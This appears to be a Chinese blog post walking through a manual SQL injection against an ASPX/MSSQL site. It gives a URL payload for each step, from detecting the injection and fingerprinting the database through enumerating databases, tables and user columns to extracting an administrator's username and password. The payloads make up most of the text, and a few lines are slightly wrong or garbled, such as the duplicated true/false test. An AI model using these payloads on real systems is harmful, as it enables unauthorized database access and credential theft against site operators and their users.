记一次常规的aspx+mssql手工注入

0x01 判断注入

http://www.xxx.com/test.aspx?id=8'and+1=1+--+   页面返回正常
http://www.xxx.com/test.aspx?id=8'and+1=1+--+   页面返回异常

0x02 判断数据库版本

http://www.xxx.com/test.aspx?id=8'and+substring((select @@version),22,4)='2008'+--+

发现当数字值为2008时,页面返回正常,可判断出:

数据库为Microsoft SQL Server 2008

0x03 查询数据库名

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=[N])+--+

dbid是数据库编号,dbid的值从15,是系统使用的,所以用户自己建的一定是从6开始的,因此我们可以查询数据库名:

http://www.xxx.com/test.aspx?id=8'and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=1)+--+

得出第一个库是master,根据dbid值递增,依次查询出数据库名:tempdbmodelmsdbReportServer$SQL2008ReportServer$SQL2008TempDB

继续查询发现dbid为部分值的时候没有结果,当dbid值为26时的数据库名为:databaseA

能查到的最后一个dbid值为134

http://www.xxx.com/test.aspx?id=8'and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=134)+--+

数据库名为databaseB,可见数据库之多。

0x04 查询数据库 databaseA 的表名

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.sysobjects where xtype='U')--

得到第一个表名是wenzhang

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.sysobjects where xtype='U' and name not in('wenzhang'))--

得到第二个表名是TF_CASE_Options,依次查询:

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.sysobjects where xtype='U' and name not in('wenzhang','TF_CASE_Options'))--

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.sysobjects where xtype='U' and name not in('wenzhang','TF_CASE_Options','tempTable1','Buy_Note','MF_CASE','td','Buy_List','ExamQuestion','Set_Price','Buy_Note_LinShi'))--

此时查询出了Users表。

0x05 查询 Users 表的列名

http://www.xxx.com/test.aspx?id=8'and 0<>(select count(*) from databaseA.dbo.sysobjects where xtype='U' and name='Users' and uid>(str(id)))+--+

爆出id174623665

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.syscolumns where id=174623665)+--+

得到UserId列,依次查询下去:

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.syscolumns where id=174623665 and name not in('UserId','UserName'))+--+
http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.syscolumns where id=174623665 and name not in('UserId','UserName','TrueName'))+--+
http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.syscolumns where id=174623665 and name not in('UserId','UserName','TrueName','Password' ))+--+

http://www.xxx.com/test.aspx?id=8'and 0<>(select top 1 name from databaseA.dbo.syscolumns where id=174623665 and name not in('UserId','UserName','TrueName','Password','IsForbidden','DepartmentId','employee_id','sfzh','sex','brithday','post','speciality','school','email','tel','ceping_name','inout','roleid','note_1','note_2','note_3','note_4','note_5','note_6','note_7','note_8','note_9'))+--+

最终得到的列名有:

'UserId','UserName','TrueName','Password','IsForbidden','DepartmentId','employee_id','sfzh','sex','brithday','post','speciality','school','email','tel','ceping_name','inout','roleid','note_1','note_2','note_3','note_4','note_5','note_6','note_7','note_8','note_9','note_10'

0x06 查询管理员信息

http://www.xxx.com/test.aspx?id=8'and 0<(select UserId from databaseA.dbo.Users where UserName>1)+--+

得到用户名:admin

http://www.xxx.com/test.aspx?id=8'and 0<(select UserId from databaseA.dbo.Users where Password>1 and UserName='admin')+--+

得到密码:password

剧终。

文章目录

发表评论

发表评论

*

沙发空缺中,还不快抢~